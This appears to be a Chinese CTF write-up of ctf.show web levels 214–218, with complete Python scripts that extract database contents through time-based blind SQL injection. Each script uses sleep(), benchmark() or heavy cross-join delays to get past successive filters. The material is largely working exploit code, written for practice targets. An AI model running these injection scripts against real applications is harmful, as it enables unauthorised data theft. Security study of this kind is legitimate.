ctfhow——web入门214~218(时间盲注开始)

web入门214
复制代码
#@another:uwvwko
import requests

url='http://b0c11589-31c9-4bf9-8b66-6b5a1fc08726.challenge.ctf.show/api/index.php'
flag=''
str='{-_1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM}'

for i in range(1,50):
    for j in str:
         # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查列名字-id.flag
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        # 查数据
        payload = "select flaga from ctfshow_flagx"
        
        data ={
            'ip':f"if(substr(({payload}),{i},1)='{j}',sleep(3),0)",
            'debug':'1'
        }
        
        r=requests.post(url,data=data)
        
        if r.elapsed.total_seconds() > 2:
            flag+=j
            print(flag)
            break
web入门215
复制代码
#@uwvwko
import requests
import time

url='http://17ae312d-8d89-42f7-b881-b9068c90093b.challenge.ctf.show/api/'

flag=''

str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'

for i in range(1,60):
    for j in str:
       
        payload={
            #'ip':f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),'{i}',1)={q},sleep(3),'False')#",
            #'ip':f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),'{i}',1)={q},sleep(3),'False')#",
            'ip': f"1' or if(substr((select group_concat(flagaa) from ctfshow_flagxc),{i},1)='{j}',sleep(3),'False')#",
            'debug': 0
               
        }
        
        r=requests.post(url,data=payload)
        if r.elapsed.total_seconds()>2:
            flag+=j
            print(flag)
            break

(为啥有个A类)

web入门216

base64编码,但是我们可以直接用)来闭合

如:where id =from_base64(0)payload

脚本:

复制代码
import requests

url='http://c5791659-334c-48d2-833a-1f0c9fa90735.challenge.ctf.show/api/'
str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''
 
for j in range(1, 50):
    for k in str:
        # payload = {'debug':'0','ip':f"1)or if(substr(database(),{j},1)='{k}',sleep(3),0)#"}  # 猜数据库名
        # payload = {'debug': '0', 'ip': f"1)or if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',sleep(3),0)#"}  # 猜表名
        # payload = {'debug': '0','ip': f"1)or if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',sleep(3),0)#"}  # 猜表名
        # payload = {'debug': '0','ip': f"1)or if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flagxcc'), {j}, 1) = '{k}',sleep(3),0)#"}  # 猜列名
        payload = {
            'debug': '0', 
            'ip': f"1)or if(substr((select flagaac from ctfshow_flagxcc), {j}, 1) = '{k}',sleep(3),0)#"}  
 
        re = requests.post(url, data=payload)
        if re.elapsed.total_seconds() > 2:
            flag += k
            print(flag)
            break
web入门217

毙了sleep

看了下大佬的payload,我们可以使用 benchmark,

benchmark(count,expr),重复执行 count 次 expr 表达式,使得处理时间很长

时间大概是3秒,然后开始写脚本

复制代码
import requests

url='http://4baeb3f2-07a1-438f-a1a6-6e984cf82339.challenge.ctf.show/api/'
str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''
 
for i in range(1, 60):
    for j in str:
        payload = {
            'debug': '1', 
            # 'ip':f"if(substr(database(),{j},1)='{k}',benchmark(3000000,md5('myon')),0)"}  # 猜数据库名
            # 'ip': f"if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',benchmark(3000000,md5('12354')),0)"} 
            # 'ip': f"if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',benchmark(3000000,md5('12345')),0)"}  
            # 'ip': f"if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flagxccb'), {j}, 1) = '{k}',benchmark(3000000,md5('123415')),0)"} 
            'ip': f"if(substr((select flagaabc from ctfshow_flagxccb), {i}, 1) = '{j}',benchmark(3000000,md5('12345')),0)"
        }
        
        r = requests.post(url, data=payload)
        
        if r.elapsed.total_seconds() > 2:
            flag += j
            print(flag)
            break
web入门218

benchmark被禁了

脚本:

复制代码
import requests

url = 'http://04ce659f-5b93-475f-8526-203b887d0719.challenge.ctf.show/api/'
str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''

for i in range(0, 60):
    for j in str:
        payload = {
        'debug': '1', 
        #'ip': f"if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database(),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')"
        #'ip': f"if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')"
        'ip': f"if(substr((select group_concat(flagaac) from ctfshow_flagxc),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')"
        }
        r = requests.post(url, data=payload)
        if r.elapsed.total_seconds() > 0.4:
            flag += j
            print(flag)
            break

(SELECT count(*) FROM information_schema.columns A, information_schema.columns B) 是一个时间延迟或资源消耗的操作,至于判断的时间要根据自己的电脑进行调试,显示出来的flag有可能会有误差

相关推荐
Database_Cool_28 分钟前
数据库慢查询优化首选方案:阿里云 RDS 性能洞察+自动诊断
数据库·人工智能·阿里云
YOU OU37 分钟前
Redis初识
数据库·redis·缓存
长孙豪翔40 分钟前
在.net中读写config文件的各种方法
java·数据库·.net
2501_943782351 小时前
【共创季稿事节】猜数字游戏:二分法思维与交互式反馈
前端·游戏·microsoft·harmonyos·鸿蒙·鸿蒙系统
GV191rLvq2 小时前
基于Socket实现的最简单的Web服务器【ASP.NET原理分析】
服务器·前端·asp.net
吠品2 小时前
LangChain 里 tool_call_id 为空?一次 MCP 工具集成的排查记录
前端
深盾科技_Virbox2 小时前
加密狗授权能力选型:从授权模型到全生命周期管理
java·网络·数据库
峥无2 小时前
深入理解MySQL事务与MVCC机制
数据库·mysql
柒和远方2 小时前
Phase 7.4 学习博客:为什么多 API 项目需要 Swagger / OpenAPI
前端·后端·架构
张龙6872 小时前
拼多多开放平台对接踩坑实录:从 CLIENT_ID 配置到 MD5 签名算法的完整填坑指南
前端